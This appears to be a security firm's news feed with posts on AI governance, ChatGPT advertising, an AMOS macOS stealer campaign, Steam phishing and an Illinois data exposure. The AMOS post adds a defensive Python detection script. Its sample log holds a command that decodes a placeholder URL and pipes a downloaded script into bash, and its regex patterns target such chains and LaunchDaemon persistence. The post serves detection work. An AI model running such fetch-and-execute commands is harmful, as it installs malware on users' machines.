Jacobian Engineering


Jacobian Engineering: Your Partner in Tailored IT and Compliance Solutions

Since 2005, Jacobian Engineering has empowered organizations to achieve strategic goals through comprehensive IT, compliance, and security solutions. As a trusted managed service provider, we specialize in designing, planning, and executing strategies that align with your vision and immediate needs.

04/11/2026

The rapid integration of AI tools into scientific research is creating new challenges for transparency and institutional integrity. Recent studies examining manuscripts submitted to JAMA Network journals found AI usage increased from 1.71% to 5.97% over just 27 months, with most authors leveraging these tools to improve writing quality. Similarly, BMJ journals reported 5.7% of submissions disclosed AI utilization.

These figures likely underrepresent actual usage. Self-disclosure depends on clear institutional guidelines, consistent enforcement, and researcher awareness of when AI assistance crosses from acceptable editing to substantive contribution requiring acknowledgment.

The implications extend beyond academic publishing. Healthcare organizations, SaaS companies, and research institutions face similar challenges across their operations: employees using AI tools for documentation, analysis, and decision support without clear governance frameworks defining acceptable use, disclosure requirements, and quality verification processes.

Three organizational priorities emerge from this data:

Establish Clear AI Use Policies: Define what constitutes acceptable AI assistance versus substantive AI contribution across different work contexts. Vague guidance leads to inconsistent practices and compliance gaps.

Implement Disclosure Mechanisms: Create standardized processes for documenting AI tool usage in work products, whether research manuscripts, clinical documentation, or software development artifacts.

Build Verification Workflows: AI-assisted outputs require human review processes calibrated to the risk level of the content. Medical research, clinical decisions, and security configurations demand rigorous verification; internal documentation may require less scrutiny.

At Jacobian Engineering, we help healthcare organizations and research institutions develop comprehensive AI governance frameworks that address these challenges. Our policy development services establish clear boundaries for AI tool usage while our compliance programs create the documentation and monitoring infrastructure needed to maintain transparency and meet regulatory expectations.

The 5-6% disclosure rates in medical journals represent early indicators of a broader transformation. Organizations that establish governance frameworks now will be better positioned to capture AI productivity benefits while maintaining the integrity standards their stakeholders expect.

04/05/2026

OpenAI is reportedly developing advertising capabilities for ChatGPT that would prioritize sponsored content directly within AI-generated responses. Ad mockups include displaying sponsored information in a sidebar alongside the main response window, with AI models potentially configured to ensure sponsored content appears in answers.

An OpenAI spokesperson confirmed the company is exploring ads, stating they're examining "what ads in our product could look like" while claiming any approach would "respect" the trusted relationship users have with ChatGPT.

The core concern here is not just advertising. It's the underlying data infrastructure that makes personalized advertising possible. ChatGPT likely knows more about users than traditional search engines. The conversational nature of AI interactions means users often share detailed context about their work, decisions, challenges, and intentions that they would never enter into a search query.

For organizations in regulated industries — healthcare, financial services, legal — this raises immediate questions about data handling, consent, and third-party risk. When employees use ChatGPT for business tasks, what information is being collected? How might that data support advertising models? What disclosures are required when AI recommendations may be influenced by commercial relationships?

The shift from utility tool to advertising platform fundamentally changes the risk profile of any AI service. Organizations that have incorporated ChatGPT into workflows need to reassess their vendor risk evaluations and data processing agreements.

Jacobian Engineering's privacy compliance services, spanning GDPR, CCPA, and sector-specific regulations, include third-party vendor assessments that evaluate how AI platforms handle sensitive business data. We help clients develop governance frameworks that address AI tool usage, data classification requirements, and appropriate use policies before regulatory guidance catches up to technological change.

Organizations should review their AI acceptable use policies now, before advertising features roll out. The time to establish data governance controls around AI tools is before the platform economics shift, not after.

04/01/2026

Attackers have discovered a new social engineering attack vector that bypasses traditional security controls entirely: weaponizing AI platform trust.

Huntress researchers disclosed a campaign on December 5, 2025 where the Atomic macOS Stealer (AMOS) is being delivered through poisoned search results that surface fake ChatGPT and Grok conversations. The attack is devastatingly simple. A user searches for something routine, "clear disk space on macOS," and Google surfaces what appear to be legitimate AI troubleshooting conversations hosted on chatgpt.com and grok.com.

These are not impersonation sites. They are real conversations on legitimate platforms, created by attackers and SEO-poisoned to rank highly. The conversations use professional formatting, reassuring language, and code blocks with Terminal commands presented as safe system cleanup instructions. When users copy and paste these commands, they execute a multi-stage infection chain that harvests passwords, escalates to root privileges, and deploys persistent malware.

The technical execution is sophisticated. The Terminal command decodes a base64-encoded URL that fetches a malicious bash script. This script presents a fake password prompt, silently validates credentials using macOS Directory Services (dscl -authonly), and then uses those credentials for privilege escalation via sudo. AMOS establishes persistence through LaunchDaemon mechanisms and includes trojanized versions of cryptocurrency wallet applications like Ledger and Trezor that harvest seed phrases.

What makes this campaign significant is how it exploits layered trust. Users trust search engines to surface vetted results. They trust chatgpt.com and grok.com as legitimate domains. They trust the familiar formatting of AI conversations. This attack does not break any of these trust layers. It weaponizes all of them simultaneously.

For organizations, this represents a fundamental shift in threat awareness. Traditional security training focuses on suspicious emails, unknown downloads, and warning dialogs. This campaign succeeds because the behavior appears completely normal.

Jacobian Engineering's security awareness training programs help organizations address this evolution. Our training emphasizes critical evaluation of all external instructions, including AI-generated content, and builds the skeptical mindset needed when any source requests Terminal access or administrative credentials.

The takeaway: platform trust is not content trust. AI assistants hosted on legitimate domains can still serve malicious instructions. Defenders need updated training programs, behavioral monitoring for anomalous Terminal and sudo usage, and clear policies about executing commands from external sources.
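The behavioral monitoring mentioned above can start as a simple rule set over per-user command history. The following is an added illustration, not code from Huntress or Jacobian Engineering: it scans constructed sample log lines (the log format, the placeholder URL and the 120-second sudo window are all assumptions) for the chain the campaign description gives, a base64-decoded value handed to curl or a shell, a downloaded script piped straight into an interpreter, a LaunchDaemon write, and sudo use shortly after any of those.

```python
import base64
import re
from datetime import datetime

# Constructed sample lines in the style of a per-user shell audit log (not real data).
# The base64 string is built from a placeholder URL so it is obviously fake.
_FAKE_B64 = base64.b64encode(b"https://example.invalid/clean.sh").decode()
SAMPLE_LOG = f"""\
2025-12-05T10:01:12 user=alice cmd=ls -la ~/Library/Caches
2025-12-05T10:01:40 user=alice cmd=echo {_FAKE_B64} | base64 -d | xargs curl -fsSL | bash
2025-12-05T10:01:52 user=alice cmd=sudo -S cp helper.plist /Library/LaunchDaemons/
2025-12-05T10:02:10 user=bob cmd=brew cleanup
2025-12-05T10:30:00 user=bob cmd=sudo softwareupdate -l
"""

# Indicators taken from the infection chain described in the post.
RULES = {
    "base64_decode_to_fetch_or_shell": re.compile(r"base64\s+(-d|-D|--decode)\b.*\|.*\b(curl|wget|bash|sh|zsh)\b"),
    "remote_script_piped_to_shell": re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(bash|sh|zsh)\b"),
    "launchdaemon_write": re.compile(r"/Library/LaunchDaemons/"),
}
SUDO_WINDOW_SECONDS = 120  # assumption: sudo this soon after a hit deserves a look

LINE_RE = re.compile(r"^(\S+) user=(\S+) cmd=(.*)$")


def scan(log_text):
    """Return [(timestamp, user, cmd, [reasons])] for lines worth alerting on."""
    hits = []
    last_hit = {}  # user -> time of that user's most recent flagged command
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue  # skip lines that do not follow the assumed format
        ts, user, cmd = datetime.fromisoformat(m.group(1)), m.group(2), m.group(3)
        reasons = [name for name, rx in RULES.items() if rx.search(cmd)]
        prev = last_hit.get(user)
        if cmd.startswith("sudo") and prev and (ts - prev).total_seconds() <= SUDO_WINDOW_SECONDS:
            reasons.append("sudo_shortly_after_flagged_command")
        if reasons:
            hits.append((m.group(1), user, cmd, reasons))
            last_hit[user] = ts
    return hits


if __name__ == "__main__":
    for ts, user, cmd, reasons in scan(SAMPLE_LOG):
        print(ts, user, reasons, cmd)
```

Bob's routine sudo call is not flagged because nothing suspicious preceded it; only Alice's piped download and the LaunchDaemon write that follows it are reported.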

Malware no longer needs to impersonate legitimate software. It just needs to impersonate help.

03/30/2026

A circulating phishing campaign targeting Steam users demonstrates why the presence of HTTPS alone should never be trusted as a security indicator.

The attack uses a fraudulent login page that looks virtually identical to Steam's legitimate site, complete with a valid SSL certificate and the familiar padlock icon. For years, users have been taught that HTTPS equals safety. Attackers know this, and they've adapted.

Obtaining SSL certificates is trivial. Free certificate authorities issue them in minutes with minimal verification. The padlock confirms that your connection to a server is encrypted. It says nothing about whether that server is legitimate. A phishing site with HTTPS simply means your stolen credentials are transmitted securely to the attacker.

What to verify instead: Check the actual URL character by character — attackers use lookalike domains (stearn.com, steam-login.com, steampowered.net). Consider how you arrived at the page; if you clicked a link from Discord, email, or social media, navigate directly to known URLs instead. Be suspicious of unexpected authentication prompts, especially those offering free items, urgent account warnings, or trade requests. And if your password manager doesn't autofill credentials, pause — it won't recognize a fake domain.

Gaming platforms are high-value targets. Steam accounts often contain significant game libraries, tradeable items worth real money, and linked payment methods. A compromised account can lead to financial theft, social engineering of your contacts, and permanent loss of digital assets.

At Jacobian Engineering, we help organizations build resilience against these attacks through security awareness training programs that teach employees to recognize sophisticated phishing attempts. Our social engineering campaigns test your team's defenses with realistic simulations, including credential harvesting sites, to identify vulnerabilities before attackers do.

The padlock icon was never meant to indicate trust. It indicates encryption. Understanding that distinction is the first step toward better security hygiene.

01/15/2026

The Illinois Department of Human Services (IDHS) has disclosed a significant security incident: an internal mapping website containing residents' personal information was publicly accessible from April 2021 through September 2025...more than four years!

The exposure affected over 700,000 individuals. Specifically, 672,616 Medicaid and Medicare Savings Program recipients had their addresses, case numbers, and demographic data exposed. An additional 32,401 individuals receiving services from the Division of Rehabilitation Services had names, addresses, and case statuses publicly viewable. The website was intended for internal use to assist with resource allocation.

Perhaps most concerning: IDHS has stated it cannot determine whether anyone actually accessed the exposed data during this extended window. This uncertainty compounds the incident's severity and underscores a fundamental gap in security monitoring and logging capabilities.

This incident illustrates several systemic issues common in public sector healthcare organizations:

Configuration management failures caused internal tools to be exposed to the public internet without proper access controls, representing a basic security hygiene breakdown. These misconfigurations often persist because they don't trigger alerts unless proper monitoring exists.

Extended detection timelines led to four years of exposure before discovery, suggesting insufficient vulnerability scanning, penetration testing, and security assessments. Regular external security evaluations would likely have identified a publicly accessible internal application.

Logging and monitoring gaps resulted in the inability to determine data access, indicating inadequate audit logging—a direct HIPAA Security Rule requirement under the Audit Controls standard (§164.312(b)).

For healthcare organizations handling protected health information, this serves as a critical reminder that compliance is not a checkbox exercise. HIPAA's Security Rule explicitly requires regular risk assessments, technical safeguards, and audit controls—precisely the areas where this incident reveals deficiencies.

Jacobian Engineering's managed compliance services, including those that specialize in HIPAA protection, help healthcare organizations identify these gaps before they become multi-year exposures. Our comprehensive risk assessments evaluate technical safeguards, access controls, and monitoring capabilities against Security Rule requirements, while our HITRUST validated assessments ensure organizations can demonstrate compliance when it matters most.

The four-year exposure window in Illinois represents the difference between proactive security management and reactive incident response. Organizations that conduct regular security assessments and maintain continuous compliance monitoring significantly reduce both their risk profile and potential regulatory exposure.

12/18/2025

Video breakdown of our latest research on synthetic vulnerabilities. Full article is in our recent post. Link in the comments.


Address

12060 Industry Boulevard #1025
Jackson, CA
95642

Opening Hours

Monday 9am - 5pm
Tuesday 9am - 5pm
Wednesday 9am - 5pm
Thursday 9am - 5pm
Friday 9am - 5pm